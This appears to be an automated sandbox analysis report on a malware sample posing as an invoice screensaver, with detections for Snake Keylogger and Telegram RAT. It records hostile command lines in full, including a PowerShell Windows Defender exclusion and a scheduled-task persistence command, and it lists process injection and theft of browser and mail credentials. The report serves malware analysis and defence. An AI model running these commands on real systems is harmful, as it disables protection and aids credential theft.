          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 450000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 2820000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 500000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 7FC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 5900000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 8FC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: 5AE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 390000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 5AC0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 5750000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 6AC0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: 7AC0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\INV000001203.scrThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6439Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1161Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2320Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7529Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2359
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1893
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8732
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1100
          Source: C:\Users\user\Desktop\INV000001203.scr TID: 3388Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scr TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3440Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\taskeng.exe TID: 3528Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe TID: 3820Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe TID: 3552Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\INV000001203.scrThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\INV000001203.scrMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\INV000001203.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\INV000001203.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrQueries volume information: C:\Users\user\Desktop\INV000001203.scr VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeQueries volume information: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
          Source: C:\Users\user\Desktop\INV000001203.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3504, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTR
          Yara detected VIP Keylogger
          Source: Yara matchFile source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: Yara matchFile source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3504, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3504, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTR
          Yara detected VIP Keylogger
          Source: Yara matchFile source: 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INV000001203.scr PID: 3236, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3836, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Command and Scripting Interpreter          		1
          Scheduled Task/Job          		311
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		1
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Scheduled Task/Job          		1
          DLL Side-Loading          		1
          Scheduled Task/Job          		11
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop Protocol1
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Software Packing          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync1
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
